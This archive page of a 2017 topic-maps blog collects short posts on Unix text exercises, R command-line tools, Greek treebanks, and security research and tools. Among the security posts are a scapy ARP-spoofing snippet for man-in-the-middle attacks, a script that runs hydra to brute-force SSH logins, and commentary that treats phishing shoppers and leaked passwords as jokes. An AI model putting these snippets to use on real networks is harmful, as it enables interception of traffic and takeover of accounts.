Another Word For It
Patrick Durusau on Topic Maps and Semantic Diversity

December 24, 2017

Unix Magnificent Seven + Bash (MorphGNT)

Filed under: Bible,Greek,Linux OS — Patrick Durusau @ 3:16 pm

Some Unix Command Line Exercises Using MorphGNT by James Tauber.

From the post:

I thought I’d help a friend learn some basic Unix command line (although pretty comprehensive for this type of work) with some practical graded exercises using MorphGNT. It worked out well so I thought I’d share in case they are useful to others.

The point here is not to actually teach how to use bash or commands like grep, awk, cut, sort, uniq, head or wc but rather to motivate their use in a gradual fashion with real use cases and to structure what to actually look up when learning how to use them.

This little set of commands has served me well for over twenty years working with MorphGNT in its various iterations (although I obviously switch to Python for anything more complex).
… (emphasis in original)

Great demonstration of what the Unix Magnificent Seven + bash can accomplish.
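To give you the flavor of the exercises: a typical one is counting the most frequent lemmas in the corpus. Tauber does that with cut, sort, uniq and head; since he mentions switching to Python for anything more complex, here is a rough Python equivalent. A sketch only: it assumes the seven-column MorphGNT file layout with the lemma in the last column, and a local directory of the per-book text files.

    # Ten most frequent lemmas in MorphGNT.
    # Shell equivalent: cat *.txt | cut -d' ' -f7 | sort | uniq -c | sort -rn | head
    from collections import Counter
    import glob

    counts = Counter()
    for path in glob.glob("sblgnt/*.txt"):   # assumed layout: one file per book
        with open(path, encoding="utf-8") as f:
            for line in f:
                if not line.strip():
                    continue
                counts[line.split()[-1]] += 1  # lemma assumed to be the last column

    for lemma, n in counts.most_common(10):
        print(n, lemma)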

Oh, and MorphGNT itself: Linguistic Databases and Python Tools for the Greek New Testament.

Next victim of your Unix text hacking skills?

A/B Tests for Disinformation/Fake News?

Filed under: A/B Tests,Fake News,Journalism,News — Patrick Durusau @ 2:59 pm

Digital Shadows describes itself this way:

Digital Shadows monitors, manages, and remediates digital risk across the widest range of sources on the visible, deep, and dark web to protect your organization.

It recently published The Business of Disinformation: A Taxonomy – Fake news is more than a political battlecry.

It’s not long, fourteen (14) pages, and it has the usual claims about disinformation and fake news you know from other sources.

However, for all its breathless prose and promotion of its solution, there is no mention of any A/B tests to show that disinformation or fake news is effective in general or against you in particular.

The value proposition offered by Digital Shadows is: everyone says disinformation and fake news are important, therefore spend money with us to combat them.

Alien abduction would be important but I won’t be buying alien abduction insurance or protection services any time soon.

Proof of the effectiveness of disinformation and fake news is on a par with proof of alien abduction.

Anything is possible, but spending money or creating policies requires proof.

Where’s the proof for the effectiveness of disinformation or fake news? No proof, no spending. Yes?

December 21, 2017

SMB – 1 billion vulnerable machines

Filed under: Cybersecurity,Microsoft,Security — Patrick Durusau @ 8:10 pm

An Introduction to SMB for Network Security Analysts by Nate “Doomsday” Marx.

Of all the common protocols a new analyst encounters, perhaps none is quite as impenetrable as Server Message Block (SMB). Its enormous size, sparse documentation, and wide variety of uses can make it one of the most intimidating protocols for junior analysts to learn. But SMB is vitally important: lateral movement in Windows Active Directory environments can be the difference between a minor and a catastrophic breach, and almost all publicly available techniques for this movement involve SMB in some way. While there are numerous guides to certain aspects of SMB available, I found a dearth of material that was accessible, thorough, and targeted towards network analysis. The goal of this guide is to explain this confusing protocol in a way that helps new analysts immediately start threat hunting with it in their networks, ignoring the irrelevant minutiae that seem to form the core of most SMB primers and focusing instead on the kinds of threats an analyst is most likely to see. This guide necessarily sacrifices completeness for accessibility: further in-depth reading is provided in footnotes. There are numerous simplifications throughout to make the basic operation of the protocol more clear; the fact that they are simplifications will not always be highlighted. Lastly, since this guide is an attempt to explain the SMB protocol from a network perspective, the discussion of host based information (windows logs, for example) has been omitted.

It never occurred to me that NTLM, introduced with Windows NT in 1993, is still supported in the latest version of Windows.

That means a deep knowledge of SMB pushes the number of systems vulnerable to you north of 1 billion.

How’s that for a line in your CV?

Keeper Security – Beyond Boo-Hooing Over Security Bullies

Filed under: Cybersecurity,Free Speech,Security — Patrick Durusau @ 8:06 pm

Security firm Keeper sues news reporter over vulnerability story by Zack Whittaker.

From the post:

Keeper, a password manager software maker, has filed a lawsuit against a news reporter and its publication after a story was posted reporting a vulnerability disclosure.

Dan Goodin, security editor at Ars Technica, was named defendant in a suit filed Tuesday by Chicago-based Keeper Security, which accused Goodin of “false and misleading statements” about the company’s password manager.

Goodin’s story, posted December 15, cited Google security researcher Tavis Ormandy, who said in a vulnerability disclosure report he posted a day earlier that a security flaw in Keeper allowed “any website to steal any password” through the password manager’s browser extension.

Goodin was one of the first to cover news of the vulnerability disclosure. He wrote that the password manager was bundled in some versions of Windows 10. When Ormandy tested the bundled password manager, he found a password stealing bug that was nearly identical to one he previously discovered in 2016.

Ormandy also posted a proof-of-concept exploit for the new vulnerability.

I’ll spare you the boo-hooing over Keeper Security‘s attempt to bully Dan Goodin and Ars Technica.

Social media criticism is like the vice-presidency: it’s not worth a warm bucket of piss.

What the hand-wringers over the bullying of Dan Goodin and Ars Technica fail to mention is your ability to stop using Keeper Security. Not a word.

In The Best Password Managers of 2018, I see ten (10) top password managers, three of which are rated as equal to or better than Keeper Security.

Sadly I don’t use Keeper Security so I can’t send tweet #1: I refuse to use/renew Keeper Security until it abandons persecution of @dangoodin001 and @arstechnica, plus pays their legal fees.

I’m left with tweet #2: I refuse to consider using Keeper Security until it abandons persecution of @dangoodin001 and @arstechnica, plus pays their legal fees.

Choose tweet 1 or 2, ask your friends to take action, and retweet.

Emacs X Window Manager

Filed under: Emacs,Linux OS — Patrick Durusau @ 8:02 pm

Emacs X Window Manager by Chris Feng.

From the webpage:

EXWM (Emacs X Window Manager) is a full-featured tiling X window manager for Emacs built on top of XELB. It features:

  • Fully keyboard-driven operations
  • Hybrid layout modes (tiling & stacking)
  • Dynamic workspace support
  • ICCCM/EWMH compliance
  • (Optional) RandR (multi-monitor) support
  • (Optional) Built-in compositing manager
  • (Optional) Built-in system tray

Please check out the screenshots to get an overview of what EXWM is capable of, and the user guide for a detailed explanation of its usage.

Note: If you install EXWM from source, it’s recommended to install XELB also from source (otherwise install both from GNU ELPA).

OK, one screenshot:

BTW, EXWM supports multiple monitors as well.

Enjoy!

Learn to Write Command Line Utilities in R

Filed under: Programming,R — Patrick Durusau @ 7:58 pm

Learn to Write Command Line Utilities in R by Mark Sellors.

From the post:

Do you know some R? Have you ever wanted to write your own command line utilities, but didn’t know where to start? Do you like Harry Potter?

If the answer to these questions is “Yes!”, then you’ve come to the right place. If the answer is “No”, but you have some free time, stick around anyway, it might be fun!

Sellors invokes the tradition of *nix command line tools saying: “The thing that most [command line] tools have in common is that they do a small number of things really well.”

The question to you is: What small things do you want to do really well?
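Sellors writes in R, but the pattern transfers to any language. For comparison, here is a minimal sketch of the same “do one small thing well” idea in Python; the utility and its options are my invention, not from the post.

    #!/usr/bin/env python3
    # countwords: count words (or lines) on stdin, pipeline-friendly.
    import argparse
    import sys

    def main():
        parser = argparse.ArgumentParser(description="Count words on stdin.")
        parser.add_argument("-l", "--lines", action="store_true",
                            help="count lines instead of words")
        args = parser.parse_args()
        text = sys.stdin.read()
        print(len(text.splitlines()) if args.lines else len(text.split()))

    if __name__ == "__main__":
        main()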

Weird machines, exploitability, and provable unexploitability

Filed under: Computer Science,Cybersecurity,Security,Vocabularies — Patrick Durusau @ 7:54 pm

Weird machines, exploitability, and provable unexploitability by Thomas Dullien (IEEE pre-print, to appear IEEE Transactions on Emerging Topics in Computing)

Abstract:

The concept of exploit is central to computer security, particularly in the context of memory corruptions. Yet, in spite of the centrality of the concept and voluminous descriptions of various exploitation techniques or countermeasures, a good theoretical framework for describing and reasoning about exploitation has not yet been put forward.

A body of concepts and folk theorems exists in the community of exploitation practitioners; unfortunately, these concepts are rarely written down or made sufficiently precise for people outside of this community to benefit from them.

This paper clarifies a number of these concepts, provides a clear definition of exploit, a clear definition of the concept of a weird machine, and how programming of a weird machine leads to exploitation. The paper also shows, somewhat counterintuitively, that it is feasible to design some software in a way that even powerful attackers – with the ability to corrupt memory once – cannot gain an advantage.

The approach in this paper is focused on memory corruptions. While it can be applied to many security vulnerabilities introduced by other programming mistakes, it does not address side channel attacks, protocol weaknesses, or security problems that are present by design.

A common vocabulary to bridge the gap between ‘Exploit practitioners’ (EPs) and academic researchers. Whether it will in fact bridge that gap remains to be seen, but even the attempt will prove useful.

Tracing the use/propagation of Dullien’s vocabulary across Google’s Project Zero reports and papers would provide a unique data set on the spread (or not) of a new vocabulary in computer science.

Not to mention being a way to map back into earlier literature with the newer vocabulary, via a topic map.

BTW, Dullien’s statement “it is feasible to design some software in a way that even powerful attackers … cannot gain an advantage,” is speculation and should not dampen your holiday spirits. (I root for the hare and not the hounds as a rule.)

Nine Kinds of Ancient Greek Treebanks

Filed under: Bible,Greek,Linguistics — Patrick Durusau @ 7:50 pm

Nine Kinds of Ancient Greek Treebanks by Jonathan Robie.

When I blog or speak about Greek treebanks, I frequently refer to one or more of the treebanks that are currently available. Few people realize how many treebanks exist for ancient Greek, and even fewer have ever seriously looked at more than one. I do not know of a web page that lists all of the ones I know of, so I thought it would be helpful to list them in one blog post, providing basic information about each.

So here is a catalog of treebanks for ancient Greek.

Most readers of this blog know Jonathan Robie from his work on XQuery and XPath, two of the XML projects that have benefited from his leadership.

What readers may not know is that Jonathan originated both b-greek (Biblical Greek Forum, est. 1992) and b-hebrew (Biblical Hebrew Forum, est. 1997). Those are not typos, b-greek began in 1992 and b-hebrew in 1997. (I checked the archives before posting.)

Not content to be the origin and maintainer of two of the standard discussion forums for biblical languages, Jonathan has undertaken to produce high quality open data for serious Bible students and professional scholars.

Texts in multiple treebanks, such as the Greek NT, make a great use case for display and analysis of overlapping trees.

December 20, 2017

Violating TCP

Filed under: Cybersecurity,Networks — Patrick Durusau @ 8:18 pm

This is strictly a violation of the TCP specification by Marek Majkowski.

From the post:

I was asked to debug another weird issue on our network. Apparently every now and then a connection going through CloudFlare would time out with 522 HTTP error.

522 error on CloudFlare indicates a connection issue between our edge server and the origin server. Most often the blame is on the origin server side – the origin server is slow, offline or encountering high packet loss. Less often the problem is on our side.

In the case I was debugging it was neither. The internet connectivity between CloudFlare and origin was perfect. No packet loss, flat latency. So why did we see a 522 error?

The root cause of this issue was pretty complex. After a lot of debugging we identified an important symptom: sometimes, once in thousands of runs, our test program failed to establish a connection between two daemons on the same machine. To be precise, an NGINX instance was trying to establish a TCP connection to our internal acceleration service on localhost. This failed with a timeout error.

It’s unlikely that you will encounter this issue but Majkowski’s debugging of it is a great story.

It also illustrates how deep the foundations of an error, bug or vulnerability may lie.

Is it a vehicle? A helicopter? No, it’s a rifle! Messing with Machine Learning

Filed under: Classifier,Image Recognition,Image Understanding,Machine Learning — Patrick Durusau @ 8:14 pm

Partial Information Attacks on Real-world AI

From the post:

We’ve developed a query-efficient approach for finding adversarial examples for black-box machine learning classifiers. We can even produce adversarial examples in the partial information black-box setting, where the attacker only gets access to “scores” for a small number of likely classes, as is the case with commercial services such as Google Cloud Vision (GCV).

The post is a quick read (est. 2 minutes) with references but you really need to see:

Query-efficient Black-box Adversarial Examples by Andrew Ilyas, Logan Engstrom, Anish Athalye, Jessy Lin.

Abstract:

Current neural network-based image classifiers are susceptible to adversarial examples, even in the black-box setting, where the attacker is limited to query access without access to gradients. Previous methods — substitute networks and coordinate-based finite-difference methods — are either unreliable or query-inefficient, making these methods impractical for certain problems.

We introduce a new method for reliably generating adversarial examples under more restricted, practical black-box threat models. First, we apply natural evolution strategies to perform black-box attacks using two to three orders of magnitude fewer queries than previous methods. Second, we introduce a new algorithm to perform targeted adversarial attacks in the partial-information setting, where the attacker only has access to a limited number of target classes. Using these techniques, we successfully perform the first targeted adversarial attack against a commercially deployed machine learning system, the Google Cloud Vision API, in the partial information setting.
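The first technique rests on natural evolution strategies: you never see gradients, so you estimate them from the classifier’s scores on randomly perturbed copies of the image. A minimal sketch of that estimator (my own, not the authors’ code; score stands in for the black-box classifier):

    import numpy as np

    def nes_gradient(score, x, sigma=0.001, n=50):
        """Estimate the gradient of score at image x (a float array) from queries alone.

        score: black-box function returning the target class probability.
        Antithetic sampling: each noise vector is paired with its negation.
        """
        grad = np.zeros_like(x)
        for _ in range(n):
            delta = np.random.randn(*x.shape)
            grad += (score(x + sigma * delta) - score(x - sigma * delta)) * delta
        return grad / (2 * sigma * n)

    # Gradient ascent on the target class score then yields the adversarial image:
    # x_adv = x + lr * np.sign(nes_gradient(score, x))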

The paper contains a striking example: a helicopter, slightly perturbed, classified as a rifle.

How does it go? Seeing is believing!

Defeating image classifiers will be an exploding market for jewel merchants, bankers, diplomats, and others with reasons to avoid being captured by modern image classification systems.

Offensive Security Conference – February 12-17 2018 // Berlin

Filed under: Conferences,Cybersecurity — Patrick Durusau @ 8:09 pm

Offensive Security Conference – February 12-17 2018 // Berlin

If you haven’t already registered/made travel arrangements, perhaps the speakers list will hurry you along.

While you wait for the conference, can you match the author(s) to the papers based on title alone? Several papers have multiple authors, but which ones?

Enjoy!

What’s in Your Wallet? Photo Defeats Windows 10 Facial Recognition

Filed under: Cybersecurity,Security — Patrick Durusau @ 11:19 am

It took more than a wallet-sized photo, but until patched, the Windows 10 Hello facial recognition feature accepted a near IR printed (340×340 pixel) image to access a Windows device.

Catalin Cimpanu has the details at: Windows 10 Facial Recognition Feature Can Be Bypassed with a Photo.

The disturbing line in Cimpanu’s report reads:

The feature is not that widespread since not many devices have the necessary hardware, yet when present, it is often used since it’s quite useful at unlocking computers without having users type in long passwords.

When hardware support for Windows Hello spreads, you can imagine its default use in corporate and government offices.

The Microsoft patch may defeat a 2-D near IR image but for the future, I’d invest in a 3-D printer with the ability to print in the near IR.

I don’t think your Guy Fawkes mask will work on most Windows devices.

But it might make a useful “cover” for a less common mask. If security forces have to search every Guy Fawkes mask, some Guy Fawkes+ masks are bound to slip through. Statistically speaking.

December 19, 2017

Was that Stevie Nicks or Tacotron 2.0? ML Singing in 2018

Filed under: Machine Learning,Music,Neural Networks — Patrick Durusau @ 7:15 pm

[S]amim @samim tweeted:

In 2018, machine learning based singing vocal synthesisers will go mainstream. It will transform the music industry beyond recognition.

With these two links:

Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions by Jonathan Shen, et al.

Abstract:

This paper describes Tacotron 2, a neural network architecture for speech synthesis directly from text. The system is composed of a recurrent sequence-to-sequence feature prediction network that maps character embeddings to mel-scale spectrograms, followed by a modified WaveNet model acting as a vocoder to synthesize time-domain waveforms from those spectrograms. Our model achieves a mean opinion score (MOS) of 4.53 comparable to a MOS of 4.58 for professionally recorded speech. To validate our design choices, we present ablation studies of key components of our system and evaluate the impact of using mel spectrograms as the input to WaveNet instead of linguistic, duration, and F0 features. We further demonstrate that using a compact acoustic intermediate representation enables significant simplification of the WaveNet architecture.

and,

Audio samples from “Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions”

Try the samples before dismissing the prediction of machine learning singing in 2018.

I have a different question:

What is in your test set for ML singing?

Among my top picks, Stevie Nicks, Janis Joplin, and of course, Grace Slick.

Practicing Vulnerability Hunting in Programming Languages for Music

Filed under: Cybersecurity,Music,Programming,Security — Patrick Durusau @ 5:38 pm

If you watched Natalie Silvanovich‘s presentation on mining the JavaScript standard for vulnerabilities, the tweet from Computer Science @CompSciFact pointing to Programming Languages Used for Music must have you drooling like one of Pavlov‘s dogs.

I count one hundred and forty-seven (147) languages, of varying degrees of popularity, none of which has gotten the security review of ECMA-262. (Michael Aranda wades through terminology/naming issues for ECMAScript vs. JavaScript at: What’s the difference between JavaScript and ECMAScript?.)

Good hunting!

December 16, 2017

Hadoop® v3.0.0, Pre-1990 Documentation Practice

Filed under: BigData,Documentation,Hadoop — Patrick Durusau @ 9:15 pm

Apache® Hadoop® v3.0.0 General Availability

From the post:

Ubiquitous Open Source enterprise framework maintains decade-long leading role in $100B annual Big Data market

The Apache Software Foundation (ASF), the all-volunteer developers, stewards, and incubators of more than 350 Open Source projects and initiatives, today announced Apache® Hadoop® v3.0.0, the latest version of the Open Source software framework for reliable, scalable, distributed computing.

Over the past decade, Apache Hadoop has become ubiquitous within the greater Big Data ecosystem by enabling firms to run and manage data applications on large hardware clusters in a distributed computing environment.

"This latest release unlocks several years of development from the Apache community," said Chris Douglas, Vice President of Apache Hadoop. "The platform continues to evolve with hardware trends and to accommodate new workloads beyond batch analytics, particularly real-time queries and long-running services. At the same time, our Open Source contributors have adapted Apache Hadoop to a wide range of deployment environments, including the Cloud."

"Hadoop 3 is a major milestone for the project, and our biggest release ever," said Andrew Wang, Apache Hadoop 3 release manager. "It represents the combined efforts of hundreds of contributors over the five years since Hadoop 2. I'm looking forward to how our users will benefit from new features in the release that improve the efficiency, scalability, and reliability of the platform."

Apache Hadoop 3.0.0 highlights include:

  • HDFS erasure coding — halves the storage cost of HDFS while also improving data durability;
  • YARN Timeline Service v.2 (preview) — improves the scalability, reliability, and usability of the Timeline Service;
  • YARN resource types — enables scheduling of additional resources, such as disks and GPUs, for better integration with machine learning and container workloads;
  • Federation of YARN and HDFS subclusters transparently scales Hadoop to tens of thousands of machines;
  • Opportunistic container execution improves resource utilization and increases task throughput for short-lived containers. In addition to its traditional, central scheduler, YARN also supports distributed scheduling of opportunistic containers; and 
  • Improved capabilities and performance improvements for cloud storage systems such as Amazon S3 (S3Guard), Microsoft Azure Data Lake, and Aliyun Object Storage System.

… (emphasis in original)

Ah, the Hadoop link.

Do you find it odd that use of the leader in the “$100B annual Big Data market” is documented by string comments in scripts and code?

Do you think non-technical management benefits from the documentation so captured?

Or that documentation for field names, routines, etc., can be easily extracted?

If software is maturing in a $100B market, shouldn’t it have mature documentation capabilities as well?

Standard Driven Bugs – Must Watch Presentation For Standards Geeks

Filed under: Cybersecurity,Security,Standards — Patrick Durusau @ 4:36 pm

From the description:

Web standards are ever-evolving and determine what browsers can do. But new features can also lead to new vulnerabilities as they exercise existing functionality in new and unexpected ways. This talk discusses some of the more interesting and unusual features of JavaScript, and how they lead to bugs in a variety of software, including Adobe Flash, Chrome, Microsoft Edge and Safari.

Natalie Silvanovich is a security researcher at Google Project Zero.

Whether you are looking for the origin of bugs in a standard or playing the long game, creating the origin of bugs in standards (the NSA, for example), this is a must-watch video!

A transcript with CVE links, etc., would be especially useful.

Russians? Nation State? Dorm Room? Mirai Botnet Facts

Filed under: Cybersecurity,Government,Journalism,News,Reporting — Patrick Durusau @ 3:40 pm

How a Dorm Room Minecraft Scam Brought Down the Internet by Garett M. Graff.

From the post:

The most dramatic cybersecurity story of 2016 came to a quiet conclusion Friday in an Anchorage courtroom, as three young American computer savants pleaded guilty to masterminding an unprecedented botnet—powered by unsecured internet-of-things devices like security cameras and wireless routers—that unleashed sweeping attacks on key internet services around the globe last fall. What drove them wasn’t anarchist politics or shadowy ties to a nation-state. It was Minecraft.

Graff’s account is mandatory reading for:

  • Hackers who want to avoid discovery by the FBI
  • Journalists who want to avoid false and/or misleading claims about cyberattacks
  • Manufacturers who want to avoid producing insecure devices (a very small number)
  • Readers who are interested in how the Mirai botnet hype played out

Enjoy!

“It is more blessed to give than to receive.” Mallers, WiFiPhisher Can Help You With That!

Filed under: Cybersecurity,Security — Patrick Durusau @ 11:25 am

Acts 20:35 records Jesus as saying, in part: “It is more blessed to give than to receive.”

Mall shoppers may honor that admonition without their knowledge (or consent).

Automated WPA Phishing Attacks: WiFiPhisher

From the webpage:

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malwares. It is primarily a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Security advice for mallers:

  • Go hard copy, shop with cash/checks.
  • Leave all wifi devices at home. Not in your car. At home.

Otherwise, you may have a very blessed holiday shopping experience.

Statistics vs. Machine Learning Dictionary (flat text vs. topic map)

Filed under: Dictionary,Machine Learning,Statistics,Topic Maps — Patrick Durusau @ 10:43 am

Data science terminology (UBC Master of Data Science)

From the webpage:

About this document

This document is intended to help students navigate the large amount of jargon, terminology, and acronyms encountered in the MDS program and beyond. There is also an accompanying blog post.

Stat-ML dictionary

This section covers terms that have different meanings in different contexts, specifically statistics vs. machine learning (ML).
… (emphasis in original)

Gasp! You don’t mean that the same words have different meanings in machine learning and statistics!

Even more shocking, some words/acronyms, have the same meaning!

Never fear, a human reader can use this document to distinguish the usages.

Automated processors, not so much.

If these terms were treated as occurrences of topics, where the topics had the respective scopes of statistics and machine-learning, then for any scoped document, an enhanced view with the correct definition for the unsteady reader could be supplied.

Static markup of legacy documents is not required as annotations can be added as a document is streamed to a reader. Opening the potential, of course, for different annotations depending upon the skill and interest of the reader.

If for each term/subject, more properties than the scope of statistics or machine-learning or both were supplied, users of the topic map could search on those properties to match terms not included here. For example: which of the many types of bias (in statistics) does bias mean in your paper? A casually written Wikipedia article reports twelve, and with refinement the number could be higher.
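A minimal sketch of that arrangement in Python (toy data; the definitions are paraphrases for illustration): the same term resolves differently depending on the scope in force, and the extra properties are there to be searched.

    # Toy scoped dictionary: one term, different meanings per scope.
    TOPICS = {
        ("bias", "statistics"): {
            "definition": "systematic deviation of an estimator from the true value",
            "properties": {"kind": "estimator bias"},
        },
        ("bias", "machine-learning"): {
            "definition": "the intercept term added to a weighted sum in a model",
            "properties": {"kind": "model parameter"},
        },
    }

    def annotate(term, scope):
        """Return the definition of term under the given scope, if known."""
        topic = TOPICS.get((term, scope))
        return topic["definition"] if topic else None

    print(annotate("bias", "statistics"))        # the statistics reading
    print(annotate("bias", "machine-learning"))  # the ML reading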

Flat text is far easier to write than a topic map but tasks every reader with re-discovering the distinctions already known to the author of the document.

Imagine your office’s, department’s, or agency’s vocabulary and its definitions captured and then used to annotate internal or external documentation for your staff.

Instead of every new staffer asking (hopefully), what do we mean by (your common term), the definition appears with a mouse-over in a document.

Are you capturing the soft knowledge of your staff?

Evil Foca [Encourage Upgrades from Windows XP]

Filed under: Cybersecurity,Security — Patrick Durusau @ 10:04 am

Network Security Testing: Evil Foca

From the webpage:

Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks. The software automatically scans the networks and identifies all devices and their respective network interfaces, specifying their IPv4 and IPv6 addresses as well as the physical addresses through a convenient and intuitive interface.

The tool is capable of carrying out various attacks such as:

  • MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection.
  • MITM on IPv6 networks with Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
  • DoS (Denial of Service) on IPv4 networks with ARP Spoofing.
  • DoS (Denial of Service) on IPv6 networks with SLAAC DoS.
  • DNS Hijacking.

Requirements

  • Windows XP or later.

ATMs and users still running Windows XP are justification for possessing a copy of Windows XP.

But upgrading from Windows XP as an operations platform should be encouraged. For any purpose.

Yes?

Otherwise, what’s next? A luggable computer for your next assignment?
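As for the attacks themselves, here is what the first one (MITM by ARP spoofing) amounts to on the wire, sketched with Python’s scapy rather than Evil Foca. Addresses are placeholders; sending this requires root and a network you are authorized to test.

    from scapy.all import ARP, send

    # Forged ARP reply (op=2): tell the victim the gateway's IP lives at
    # our MAC, so the victim's traffic detours through us.
    spoof = ARP(op=2,
                psrc="192.168.1.1",          # IP we claim to be (the gateway)
                pdst="192.168.1.50",         # victim's IP
                hwdst="aa:bb:cc:dd:ee:ff")   # victim's MAC

    send(spoof, inter=2, loop=1)  # re-send every 2 seconds to keep the cache poisoned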

December 15, 2017

getExploit (utility)

Filed under: Cybersecurity,Security — Patrick Durusau @ 9:38 pm

getExploit

From the webpage:

Python script to explore exploits from exploit-db.com. A similar script exists in Kali Linux, but this Python script provides more flexibility at search and download time.

Looks useful, modulo the added risk of a local copy.

Yeti (You Are What You Record)

Filed under: Cybersecurity,Security — Patrick Durusau @ 9:09 pm

Open Distributed Threat Intelligence: Yeti

From the webpage:

Yeti is a platform meant to organize observables, indicators of compromise, TTPs, and knowledge on threats in a single, unified repository. Yeti will also automatically enrich observables (e.g. resolve domains, geolocate IPs) so that you don’t have to. Yeti provides an interface for humans (shiny Bootstrap-based UI) and one for machines (web API) so that your other tools can talk nicely to it.

Yeti was born out of frustration of having to answer the question “where have I seen this artifact before?” or Googling shady domains to tie them to a malware family.

In a nutshell, Yeti allows you to:

  • Submit observables and get a pretty good guess on the nature of the threat.
  • Inversely, focus on a threat and quickly list all TTPs, Observables, and associated malware.
  • Let responders skip the “Google the artifact” stage of incident response.
  • Let analysts focus on adding intelligence rather than worrying about machine-readable export formats.
  • Visualize relationship graphs between different threats.

This is done by:

  • Collecting and processing observables from a wide array of different sources (MISP instances, malware trackers, XML feeds, JSON feeds…)
  • Providing a web API to automate queries (think incident management platform) and enrichment (think malware sandbox).
  • Exporting the data in user-defined formats so that they can be ingested by third-party applications (think blocklists, SIEM).
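For the automation-minded, talking to that web API might look something like this with Python requests. The endpoint path and field names below are hypothetical, for flavor only; check the Yeti documentation for the real interface.

    import requests

    YETI = "http://localhost:5000/api"   # hypothetical base URL for a local Yeti

    def search_observable(value):
        """Ask Yeti: where have I seen this artifact before? (hypothetical endpoint)"""
        resp = requests.post(YETI + "/observablesearch/",
                             json={"filter": {"value": value}})
        resp.raise_for_status()
        return resp.json()

    for hit in search_observable("shady-domain.example.com"):
        print(hit)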

Yeti sounds like a good tool, but always remember: You Are What You Record.

Innocent activities captured in your Yeti repository could be made to look like plans for criminal activity.

Just a word to the wise.

KubeCon/CloudNativeCon [Breaking Into Clouds]

Filed under: Cloud Computing,Conferences,Cybersecurity,Security — Patrick Durusau @ 8:48 pm

KubeCon/CloudNativeCon just concluded in Austin, Texas with 179 videos now available on YouTube.

A sortable list of presentations: https://kccncna17.sched.com/. How long that will persist isn’t clear.

If you missed Why The Federal Government Warmed Up To Cloud Computing, take a minute to review it now. It’s a promotional piece but the essential take away, government data is moving to the cloud, remains valid.

To detect security failures during migration and post-migration, you will need to know cloud technology better than the average migration tech.

The videos from KubeCon/CloudNativeCon 2017 are a nice starter set in that direction.

Colorized Math Equations [Algorithms?]

Filed under: Algorithms,Examples,Visualization — Patrick Durusau @ 5:13 pm

Colorized Math Equations by Kalid Azad.

From the post:

Years ago, while working on an explanation of the Fourier Transform, I found this diagram:


Argh! Why aren’t more math concepts introduced this way?

Most ideas aren’t inherently confusing, but their technical description can be (e.g., reading sheet music vs. hearing the song.)

My learning strategy is to find what actually helps when learning a concept, and do more of it. Not the stodgy description in the textbook — what made it click for you?

The checklist of what I need is ADEPT: Analogy, Diagram, Example, Plain-English Definition, and Technical Definition.

Here’s a few reasons I like the colorized equations so much:

  • The plain-English description forces an analogy for the equation. Concepts like “energy”, “path”, “spin” aren’t directly stated in the equation.
  • The colors, text, and equations are themselves a diagram. Our eyes bounce back and forth, reading the equation like a map (not a string of symbols).
  • The technical description — our ultimate goal — is not hidden. We’re not choosing between intuition or technical, it’s intuition for the technical.

Of course, we still need examples to check our understanding, but 4/5 ain’t bad!

Azad includes a LaTeX template that he uses to create colorized math equations.
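The flavor of the technique, in a minimal LaTeX sketch of my own (not Azad’s template): color each term of an equation and repeat the color in its plain-English label.

    \documentclass{article}
    \usepackage{xcolor}
    \begin{document}

    % E = mc^2, each symbol tied to its plain-English meaning by color.
    \[
    \textcolor{blue}{E} = \textcolor{red}{m}\,\textcolor{teal}{c^2}
    \]

    \noindent
    \textcolor{blue}{energy} equals \textcolor{red}{mass} times
    \textcolor{teal}{the speed of light, squared}.

    \end{document}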

Consider the potential use of color + explanation for algorithms. Being mindful that use of color presents accessibility issues that will require cleverness on your part.

Another tool for your explanation quiver!

THC-Hydra – Very Fast Network Logon Cracker

Filed under: Cybersecurity,Security — Patrick Durusau @ 3:11 pm

Very Fast Network Logon Cracker: THC-Hydra

From the webpage:

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast. This fast, and many will say fastest network logon cracker supports many different services. Deemed ‘The best parallelized login hacker’: for Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support and is part of Nessus.

If you don’t know CyberPunk, they have great graphics.

If you have found the recent 1.4 billion password dump, THC-Hydra is in your near future.
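If you do reach for it, driving hydra from Python over a list of hosts takes only a few lines. A sketch, assuming hydra is on your PATH; -l and -P are its standard single-login and password-file flags, and you only test systems you are authorized to audit.

    import subprocess

    hosts = ["10.0.0.5", "10.0.0.6"]

    for host in hosts:
        subprocess.run(
            ["hydra",
             "-l", "admin",           # single login to try
             "-P", "passwords.txt",   # password list, e.g. from that dump
             host, "ssh"],            # target and service module
            check=False,              # keep sweeping even if one host fails
        )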

IndonesiaLeaks [Leak early, Leak often]

Filed under: Journalism,News,Reporting — Patrick Durusau @ 11:55 am

IndonesiaLeaks: New Platform for Whistleblowers and Muckrakers

From the post:

Ten media houses and five civil society organizations in Indonesia announced a collaboration this week to form a digital platform for whistleblowers.

IndonesiaLeaks will allow the public a platform to anonymously and securely submit information, documents and data sets related to the public interest. The information received by IndonesiaLeaks will then be vetted and verified for use in investigative reports by the ten affiliated media organizations.

The secure online platform is crucial in Indonesia due to the lack of whistleblower protection schemes. Those who take risks leaking information on offenses happening in their institutions are often prosecuted and intimidated.

“IndonesiaLeaks is designed as a collaborative platform between ten media houses to share tasks, responsibilities and resources, as well as risks,” said Wahyu Dhyatmika, the editor of IndonesiaLeaks member publication Tempo.co, at the platform’s launch in Jakarta on Thursday. “By creating this partnership, we hope the impacts of investigative journalism will be bigger and spread widely.”

A welcome surprise as a hard year for the media draws to a close. The chest pounding antics of the American President aren’t the only woes for the media in 2017, but they have been some of the most visible.

IndonesiaLeaks promises to give the sordid side of government (is there another side?) greater visibility. This collaboration will provide strength in numbers and resources for its participants, furthering their ability to practice investigative journalism.

I don’t read Indonesian but the website is attractive and focuses on the secure submission of documents. I rather like that, clean, focused, and to the point.


